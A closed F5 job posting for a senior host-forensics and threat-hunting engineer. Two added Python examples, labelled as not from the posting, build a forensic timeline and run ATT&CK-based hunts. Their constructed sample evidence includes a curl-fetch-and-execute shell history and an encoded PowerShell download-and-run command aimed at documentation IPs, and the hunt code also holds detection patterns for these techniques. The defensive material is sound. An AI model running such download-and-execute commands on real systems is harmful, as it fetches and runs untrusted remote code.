F5 Networks
Senior Security Engineer, Host Forensics
This job is now closed
Job Description
- Req#: RP1036126
Key Responsibilities
Lead and guide team members in host forensics, root-cause analysis (RCA), and digital investigations, including mentoring and upskilling efforts aligned to SANS DFIR best practices and certifications.
Digital Forensics and Incident Response (DFIR) lifecycle
Preparation: Building plans, playbooks, logging, tools, and training so you are ready before an incident happens.
Identification: Detecting and confirming that an incident has occurred and scoping which systems, accounts, and data are affected.
Preservation and collection: Capturing volatile data, imaging disks, and collecting logs and artifacts in a forensically sound way (chain of custody, no contamination).
Examination and analysis: Parsing and correlating evidence (files, memory, registry, logs, network data) to reconstruct the attacker’s actions and timeline.
Containment: Isolating affected systems or accounts to stop the attacker from moving further or causing more damage.
Eradication: Removing malware, closing vulnerabilities, killing persistence mechanisms, and ensuring the threat is fully removed.
Recovery: Safely restoring systems and services to normal operation and monitoring closely for any signs of re-compromise.
Lessons learned/reporting: Documenting what happened, producing a clear report, updating detections/playbooks, and improving controls so the same incident is less likely or less damaging next time.
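The preservation/collection and examination/analysis phases above, as an added worked example that is not part of the job posting: a Python script that hashes every collected artifact into a chain-of-custody manifest at acquisition time, re-verifies the working copies later, and merges two constructed Linux artifacts (a traditional syslog-style auth.log and a root bash history written with HISTTIMEFORMAT epoch stamps) into one UTC-normalized timeline, from which dwell time to detection is computed. Host names, IP addresses, paths, and log lines are all constructed; because classic syslog lines carry no year and no zone, the year is assumed to be 2024 and the times are assumed to be UTC.

```python
from __future__ import annotations

import hashlib
import re
from dataclasses import dataclass
from datetime import datetime, timezone

# Constructed sample artifacts standing in for files acquired from a Linux host; not real evidence.
ARTIFACTS: dict[str, bytes] = {
    "var/log/auth.log": (
        b"Mar 14 02:11:07 web01 sshd[4121]: Accepted password for deploy from 203.0.113.45 port 51822 ssh2\n"
        b"Mar 14 02:11:09 web01 sudo:   deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/bin/bash\n"
    ),
    "root/.bash_history": (
        b"#1710382271\ncurl -s http://198.51.100.7/x.sh -o /tmp/x.sh\n"
        b"#1710382275\nchmod +x /tmp/x.sh && /tmp/x.sh\n"
        b"#1710382290\ncrontab -l\n"
    ),
}
SYSLOG_YEAR = 2024  # assumption: classic syslog lines carry no year; take it from the image metadata


@dataclass(frozen=True)
class ManifestEntry:
    path: str
    sha256: str
    size: int
    collected_at: str  # UTC, ISO 8601
    collector: str


def collect(artifacts: dict[str, bytes], collector: str) -> list[ManifestEntry]:
    """Hash each artifact at acquisition so the working copy can later be proven unaltered."""
    now = datetime.now(timezone.utc).isoformat(timespec="seconds")
    return [
        ManifestEntry(path, hashlib.sha256(data).hexdigest(), len(data), now, collector)
        for path, data in sorted(artifacts.items())
    ]


def verify(manifest: list[ManifestEntry], artifacts: dict[str, bytes]) -> list[str]:
    """Return paths whose content no longer matches the manifest: contamination or tampering."""
    return [
        entry.path
        for entry in manifest
        if hashlib.sha256(artifacts.get(entry.path, b"")).hexdigest() != entry.sha256
    ]


@dataclass(frozen=True)
class Event:
    ts: datetime
    source: str
    detail: str


SYSLOG_RE = re.compile(r"^(\w{3}) +(\d{1,2}) (\d\d:\d\d:\d\d) (\S+) (.*)$")


def parse_auth_log(data: bytes, source: str) -> list[Event]:
    """Traditional syslog: 'Mon DD HH:MM:SS host message'; no year, and the zone is assumed UTC here."""
    events = []
    for line in data.decode(errors="replace").splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        mon, day, clock, _host, msg = m.groups()
        ts = datetime.strptime(f"{SYSLOG_YEAR} {mon} {day} {clock}", "%Y %b %d %H:%M:%S")
        events.append(Event(ts.replace(tzinfo=timezone.utc), source, msg))
    return events


def parse_bash_history(data: bytes, source: str) -> list[Event]:
    """With HISTTIMEFORMAT set, bash writes '#<epoch>' before each command; pair them up."""
    events, pending = [], None
    for line in data.decode(errors="replace").splitlines():
        if line.startswith("#") and line[1:].isdigit():
            pending = datetime.fromtimestamp(int(line[1:]), tz=timezone.utc)
        elif pending is not None:
            events.append(Event(pending, source, line))
            pending = None
    return events


PARSERS = {"var/log/auth.log": parse_auth_log, "root/.bash_history": parse_bash_history}


def build_timeline(artifacts: dict[str, bytes]) -> list[Event]:
    """Normalize every artifact to UTC events and merge them into one ordered timeline."""
    events: list[Event] = []
    for path, data in artifacts.items():
        parser = PARSERS.get(path)
        if parser is not None:
            events.extend(parser(data, path))
    return sorted(events, key=lambda e: e.ts)


def dwell_time_hours(timeline: list[Event], detected_at: datetime) -> float:
    """Hours between the earliest reconstructed attacker action and detection."""
    return (detected_at - timeline[0].ts).total_seconds() / 3600


if __name__ == "__main__":
    manifest = collect(ARTIFACTS, collector="analyst@example.test")
    assert verify(manifest, ARTIFACTS) == []  # working copy still matches acquisition hashes
    for event in build_timeline(ARTIFACTS):
        print(event.ts.isoformat(), event.source, event.detail)
```

The manifest is written on the collector at acquisition time and kept apart from the working copies; any path returned by verify means that copy is no longer evidence-grade and analysis must restart from the original image. Every parser converts to timezone-aware UTC before the merge, because a timeline built from mixed local and UTC stamps silently reorders the attacker's actions.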
Automate manual DFIR processes to reduce operational toil and improve response times, including automation of common host forensics, evidence collection, and hunting workflows.
Perform proactive host-centric threat hunting and forensics (AWS, Azure, GCP, Linux, Windows, macOS), including disk and memory acquisition, log and artifact analysis, and timeline reconstruction.
Conduct technical security assessments, including static/dynamic analysis, threat modeling, and forensic reconstruction of attack chains and dwell time across endpoints and workloads.
Collaborate with SRE, Architecture, and Operations teams to implement security standards and controls informed by forensic and hunting findings.
Utilize security tooling (e.g., FTK, Cyber Triage, Magnet AXIOM, EDR such as CrowdStrike, SOAR, DLP, vulnerability scanners, posture management, and memory forensics tools) as primary data sources for host forensics and threat hunting to detect, investigate, and contain threats.
Advise stakeholders on secure design principles and security best practices based on observed attacker behaviors and forensic learnings.
Maintain and improve security runbooks and documentation, including endpoint and cloud forensics procedures, incident response guides, and threat hunting playbooks.
Stay current on emerging threats, CVEs, attacker TTPs, and DFIR industry trends and apply them to host forensics and threat hunting practices.
Follow F5 information security policies and protect information assets from unauthorized access, disclosure, modification, destruction, or interference.
Perform other related duties as assigned.
Follow the F5 behaviors.
Required Skills & Experience
8+ years in cybersecurity, including hands-on host/endpoint forensics, cloud forensics, digital forensics and incident response (DFIR), and threat hunting.
Demonstrated use of DFIR tools such as FTK, Cyber Triage, and Magnet AXIOM.
Proven ability to design and execute host-focused and hybrid threat hunts (hypothesis-driven and analytics-driven) across endpoints, networks, and cloud environments, and to turn results into new detections or control improvements.
Experience with SIEM and NG-SIEM platforms (e.g., CrowdStrike Falcon, Splunk, Microsoft Sentinel), SOAR, and EDR/XDR tools used as primary sources for forensic evidence and hunting data.
Deep understanding of MITRE ATT&CK and threat actor TTPs, and ability to translate them into host-centric hunt hypotheses, forensic pivot points, queries, and playbooks.
Demonstrated hands-on experience performing endpoint and cloud forensics (for example, disk and memory acquisition, registry and file system analysis, log and artifact analysis, and detailed timeline reconstruction) during investigations.
Proficiency in scripting or utilizing automation tools (Python, PowerApps, Power Automate, or similar) to automate forensic evidence collection, enrichment, and hunting/reporting workflows.
Hands-on experience with cloud security (AWS, Azure, GCP) and infrastructure as code (Terraform, Ansible).
Solid grasp of UNIX/Linux systems, networking protocols, and firewall architecture.
Experience with vulnerability management, penetration testing, and secure architecture design.
Excellent communication skills with ability to interface across technical and non-technical stakeholders and clearly convey forensic findings, hunt outcomes, and recommendations.
Certifications: SANS DFIR and threat hunting certifications such as GCFA, GCFR, GCIH, or equivalent advanced host forensics and hunting training.
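How an ATT&CK technique becomes a hunt hypothesis, a query, and a set of forensic pivot points, as an added Python example that is not from F5 or the posting. It runs a hypothesis-driven pass (Office spawning PowerShell with an encoded command, T1059.001; schtasks creating a task whose action lives in a user-writable path, T1053.005) and an analytics-driven pass (parent/child process pairs rare across the fleet) over constructed EDR-style process-creation events. Field names, hosts, users, and the encoded payload are all constructed; real EDR schemas differ and the field mapping is an assumption.

```python
from __future__ import annotations

import base64
import re
from collections import defaultdict


def encode_powershell(script: str) -> str:
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode()


# Constructed process-creation telemetry in an assumed flat schema; not from any real EDR.
EVENTS = [
    {"ts": "2024-03-14T09:02:11Z", "host": "ws-17", "user": "j.doe", "parent": "WINWORD.EXE",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + encode_powershell("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')")},
    {"ts": "2024-03-14T09:02:40Z", "host": "ws-17", "user": "j.doe", "parent": "powershell.exe",
     "image": "schtasks.exe",
     "cmdline": r"schtasks /create /tn Updater /tr C:\Users\Public\u.exe /sc minute /mo 5"},
    {"ts": "2024-03-14T09:10:00Z", "host": "ws-03", "user": "a.lee", "parent": "explorer.exe",
     "image": "powershell.exe", "cmdline": "powershell.exe Get-ChildItem C:\\Temp"},
    {"ts": "2024-03-14T09:11:00Z", "host": "ws-21", "user": "b.kim", "parent": "explorer.exe",
     "image": "powershell.exe", "cmdline": "powershell.exe -File deploy.ps1"},
    {"ts": "2024-03-14T09:12:00Z", "host": "ws-21", "user": "svc_build", "parent": "cmd.exe",
     "image": "schtasks.exe", "cmdline": "schtasks /query /tn Backup"},
    {"ts": "2024-03-14T09:13:00Z", "host": "ws-03", "user": "a.lee", "parent": "explorer.exe",
     "image": "chrome.exe", "cmdline": "chrome.exe"},
    {"ts": "2024-03-14T09:14:00Z", "host": "ws-05", "user": "c.ng", "parent": "explorer.exe",
     "image": "chrome.exe", "cmdline": "chrome.exe"},
]

OFFICE = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}
# Task actions under these directories are writable by ordinary users (a common persistence drop spot).
USER_WRITABLE = re.compile(r"\\(Users\\Public|Temp|AppData)\\", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand; cover the ones seen in practice.
ENC_FLAG = re.compile(r"\s-(?:encodedcommand|enc|en|ec|e)\b\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> str | None:
    """Recover the script text from an encoded PowerShell command line, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


# (ATT&CK technique ID, hypothesis, predicate over one event)
HYPOTHESES = [
    ("T1059.001", "Office application spawned PowerShell with an encoded command",
     lambda e: e["image"].lower() == "powershell.exe" and e["parent"].upper() in OFFICE
     and decode_encoded_command(e["cmdline"]) is not None),
    ("T1053.005", "Scheduled task created with its action in a user-writable path",
     lambda e: e["image"].lower() == "schtasks.exe" and "/create" in e["cmdline"].lower()
     and USER_WRITABLE.search(e["cmdline"]) is not None),
]


def hunt(events: list[dict]) -> list[dict]:
    """Hypothesis-driven pass: each finding carries the pivot points for the follow-on host forensics."""
    findings = []
    for technique, hypothesis, predicate in HYPOTHESES:
        for e in events:
            if predicate(e):
                findings.append({
                    "technique": technique, "hypothesis": hypothesis, "host": e["host"],
                    "user": e["user"], "ts": e["ts"], "parent": e["parent"],
                    "decoded": decode_encoded_command(e["cmdline"]),
                })
    return findings


def rare_parent_child(events: list[dict], max_hosts: int = 1) -> list[tuple[str, str]]:
    """Analytics-driven pass: parent->child pairs observed on at most max_hosts distinct hosts."""
    hosts: dict[tuple[str, str], set[str]] = defaultdict(set)
    for e in events:
        hosts[(e["parent"].lower(), e["image"].lower())].add(e["host"])
    return sorted(pair for pair, seen in hosts.items() if len(seen) <= max_hosts)


if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f["technique"], f["host"], f["user"], f["ts"], "parent:", f["parent"], "decoded:", f["decoded"])
    print("rare parent/child pairs:", rare_parent_child(EVENTS))
```

The two passes are complementary: the hypothesis pass returns the host, user, timestamp, and parent image to pivot into memory acquisition and timeline work, while the prevalence pass also surfaces benign one-offs (here cmd.exe launching schtasks /query), so its output is a triage queue, not a detection. Once a hypothesis proves out, its predicate is the specification for the production SIEM or EDR query.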
Preferred Qualifications
Experience with ServiceNow, ADO, or similar ticketing/case management systems to manage DFIR and hunting workflows.
Familiarity with container orchestration (Kubernetes, Docker) and CI/CD pipelines.
Exposure to FedRAMP, eDiscovery, and DLP casework.
Strong interpersonal skills and a collaborative mindset.
Ability to lead and mentor junior engineers and analysts in host forensics and threat hunting methodologies.
Ability to drive strategic long-term DFIR and hunting initiatives with cross-org leaders.
Ability to effectively present technical investigations, forensic narratives, and hunt outcomes to executive leadership.
Work Environment
Full-time position with potential for shift flexibility.
Requires scheduled on-call work outside core business hours (early mornings, evenings, weekends, holidays), shared with the larger team.
Duties performed at a desk or computer station; remote collaboration across time zones.
At F5, we strive to bring a better digital world to life. Our teams empower organizations across the globe to create, secure, and run applications that enhance how we experience our evolving digital world. We are passionate about cybersecurity, from protecting consumers from fraud to enabling companies to focus on innovation.
Everything we do centers around people. That means we obsess over how to make the lives of our customers, and their customers, better. And it means we prioritize a diverse F5 community where each individual can thrive.
About the Role
Join a high-impact team using cutting-edge security technologies and practices to protect F5's enterprise and product environments. As a Senior Security Engineer focused on host forensics and threat hunting, you will lead strategic DFIR initiatives, develop technical solutions, and drive continuous improvements in our cyber defense capabilities. You'll be a key player in host and cloud forensics, incident response, and advanced threat hunting across cloud and on-prem environments, leveraging industry-leading SANS DFIR and threat hunting training.
The Job Description is intended to be a general representation of the responsibilities and requirements of the job. However, the description may not be all-inclusive, and responsibilities and requirements are subject to change.
The annual base pay for this position is: $128,000.00 - $192,000.00
F5 maintains broad salary ranges for its roles in order to account for variations in knowledge, skills, experience, geographic locations, and market conditions, as well as to reflect F5's differing products, industries, and lines of business. The pay range referenced is as of the time of the job posting and is subject to change.
You may also be offered incentive compensation, bonus, restricted stock units, and benefits. More details about F5’s benefits can be found at the following link: https://www.f5.com/company/careers/benefits . F5 reserves the right to change or terminate any benefit plan without notice.
Please note that F5 only contacts candidates through an F5 email address (ending with @f5.com) or automated email notifications from Workday (ending with f5.com or @myworkday.com).
Equal Employment Opportunity
It is the policy of F5 to provide equal employment opportunities to all employees and employment applicants without regard to unlawful considerations of race, religion, color, national origin, sex, sexual orientation, gender identity or expression, age, sensory, physical, or mental disability, marital status, veteran or military status, genetic information, or any other classification protected by applicable local, state, or federal laws. This policy applies to all aspects of employment, including, but not limited to, hiring, job assignment, compensation, promotion, benefits, training, discipline, and termination. F5 offers a variety of reasonable accommodations for candidates. Requesting an accommodation is completely voluntary. F5 will assess the need for accommodations in the application process separately from those that may be needed to perform the job. Request by contacting accommodations@f5.com.
About the company
F5, Inc.
F5 is headquartered in Seattle, Washington, in F5 Tower, with an additional 75 offices in 43 countries focusing on account management, global services support, product development, manufacturing, software engineering, and administrative jobs.
Notice
Talentify is an Equal Opportunity Employer. All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, sexual orientation, gender identity, national origin, disability, or protected veteran status.
Talentify provides reasonable accommodations to qualified applicants with disabilities, including disabled veterans. Request assistance at accessibility@talentify.io or 407-000-0000.
Federal law requires every new hire to complete Form I-9 and present proof of identity and U.S. work eligibility.
An Automated Employment Decision Tool (AEDT) will score your job-related skills and responses. Bias-audit & data-use details: www.talentify.io/bias-audit-report. NYC applicants may request an alternative process or accommodation at aedt@talentify.io or 407-000-0000.